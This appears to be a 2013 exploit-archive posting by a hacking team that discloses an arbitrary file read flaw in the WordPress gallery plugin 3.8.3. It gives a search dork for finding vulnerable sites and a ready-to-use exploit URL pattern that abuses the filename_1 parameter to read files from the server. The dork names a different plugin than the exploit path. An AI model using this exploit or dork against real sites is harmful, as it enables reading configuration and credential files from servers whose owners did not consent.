facebook facebook twitter rss

Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability

Author: IrIsT Security & Researcher Team , Published: 10-01-2013
##############################################################################################
#
# Exploit Title : Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability
#
# Author : IrIsT.Ir
#
# Discovered By : Beni_Vanda
#
# Home : http://IrIsT.Ir/forum/
#
# Software Link : http://wordpress.org/extend/plugins/gallery-plugin/
#
# Security Risk : High
#
# Version : All Version
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : inurl:plugins/nextgen-gallery
#
##############################################################################################
#
# Expl0iTs :
#
# [Target]/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR]
#
#
##############################################################################################
#
# Greats : Amir - B3HZ4D - C0dex - TaK.FaNaR - Dead.Zone - nimaarek - m3hdi - F@rid - dr.tofan
#
# and All Members In Www.IrIsT.Ir/forum
#
##############################################################################################

Like us on Facebook :